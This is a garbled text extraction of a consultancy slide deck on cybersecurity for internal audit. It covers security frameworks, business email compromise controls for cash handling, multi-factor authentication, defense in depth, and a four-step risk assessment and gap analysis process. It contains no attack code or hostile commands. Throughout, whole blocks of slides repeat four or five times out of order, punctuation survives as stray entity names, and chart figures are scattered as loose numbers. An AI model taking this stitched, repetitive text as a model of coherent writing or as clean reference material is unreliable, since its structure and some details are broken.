STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
